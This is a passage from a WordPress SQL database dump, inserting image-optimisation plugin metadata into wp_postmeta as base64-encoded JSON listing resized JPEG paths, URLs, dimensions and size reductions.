pb24iOjEsInRpbWUiOjE0ODM1NzQ5OTIsImlkIjoxMTc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMzAsInRpbWUiOjE0ODM1NzQ5OTQsImlkIjoxMTc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0OTk3LCJpZCI6MTE3NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjYzMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjYzMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjYzMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTAwMCwiaWQiOjExNzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2MzEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2MzEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2MzEtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwMDIsImlkIjoxMTc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjMxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDA1LCJpZCI6MTE3NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjYzMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjYzMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjYzMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTAwOCwiaWQiOjExNzR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29712, 1173, 'wpfc_optimisation_reduction', '2338224'); 
INSERT INTO `wp_postmeta` VALUES (29713, 1173, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NDEuanBnIiwicmVkdWN0aW9uIjoyMzM4MDc1LCJ0aW1lIjoxNDgzNTc1MDE5LCJpZCI6IjExNzMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY0MS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTAyMiwiaWQiOjExNzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDI1LCJpZCI6MTE3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NDEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwMjgsImlkIjoxMTczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY0MS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDMyLCJpZCI6MTE3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwMzUsImlkIjoxMTczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY0MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTAzNywiaWQiOjExNzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDQwLCJpZCI6MTE3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NDEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwNDMsImlkIjoxMTczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMzYsInRpbWUiOjE0ODM1NzUwNDUsImlkIjoxMTczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDQ4LCJpZCI6MTE3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY0MS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTA1MSwiaWQiOjExNzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NDEtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwNTMsImlkIjoxMTczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjQxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDU2LCJpZCI6MTE3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY0MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY0MS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTA1OCwiaWQiOjExNzN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29714, 1172, 'wpfc_optimisation_reduction', '2543066'); 
INSERT INTO `wp_postmeta` VALUES (29715, 1172, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NTEuanBnIiwicmVkdWN0aW9uIjoyNTQyNjUzLCJ0aW1lIjoxNDgzNTc1MDcwLCJpZCI6IjExNzIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY1MS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTA3MywiaWQiOjExNzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDc2LCJpZCI6MTE3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwNzksImlkIjoxMTcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY1MS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDgyLCJpZCI6MTE3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwODUsImlkIjoxMTcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY1MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTA4NywiaWQiOjExNzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYW